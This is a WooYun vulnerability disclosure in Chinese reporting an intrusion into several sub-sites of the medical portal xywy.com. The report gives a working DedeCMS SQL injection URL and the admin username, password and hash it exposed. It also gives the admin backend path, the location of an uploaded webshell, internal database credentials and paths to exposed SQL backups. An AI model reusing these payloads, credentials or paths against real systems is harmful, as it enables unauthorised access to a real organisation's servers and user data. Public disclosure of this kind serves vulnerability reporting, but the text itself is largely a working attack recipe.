当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-016166

漏洞标题:寻医问药旗下数个分系统可被入侵

相关厂商:寻医问药

漏洞作者: momo

提交时间:2012-12-18 11:03

修复时间:2012-12-23 11:04

公开时间:2012-12-23 11:04

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-12-18: 细节已通知厂商并且等待厂商处理中
2012-12-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

寻医问药旗下数个分系统可被入侵and大部分源码泄露。

详细说明:

通过某个分站,然后得到很多网站曾经服务器的源码信息。
dedecms5.7
注入得到管理员账号为:admin 密码:admin_123
http://ztjb.xywy.com/fk/uploads/member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@`'`
密码:bb9a66419380a7e8b034 解密后为:admin_123
后台:
http://ztjb.xywy.com/fk/uploads/dede admin admin_123
直接拿shell:
http://ztjb.xywy.com/fk/uploads/data/enums/love.php
权限蛮大,可以直接跨目录浏览,可读可写。
虽然大部分分站已经转移到和主站同一服务器,但是曾经分站服务器上的备份依然存在,包括备份的数据库,可以通过备份的数据库进一步搜集密码,能不能做进一步测试,你们说了算,我点到为止。
其中包含:xywy站点、wenkang站点、lp120站点、jkqs站点及其分站等等
————————————————————————————————————————————————————————————————
其二:
内网可被渗透!
数据库测试一个lp120的,既然内网,成功连接上:
ip:192.168.0.221 user:lp120 pass:rgFv44b61kax db:lp120
————————————————————————————————————————————————————————————————
其三:
主站通过某些地方文件查到也是dede内核的。
主站的某个备份,虽然我发的备份作用不大,但是能够知道备份的路径,目测很多已经被搜索引擎收录了。
www.xywy.com/zzk/zzkapp/sql/zzkclass.sql
www.xywy.com/zzk/zzkapp/sql/zzkinfo.sql
www.xywy.com/zzk/zzkapp/sql/buwei.sql
—————————————————————————————————————————————————————————————————
具体的请技术人员看图吧。

漏洞证明:

1.jpg


2.jpg


3.jpg


4.png


5.jpg


6.png


7.png


9.jpg

修复方案:

能不能送个蛇年公仔作为我儿子明年出生的吉祥物?

版权声明:转载请注明来源 momo@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-12-23 11:04

厂商回复:

最新状态:

暂无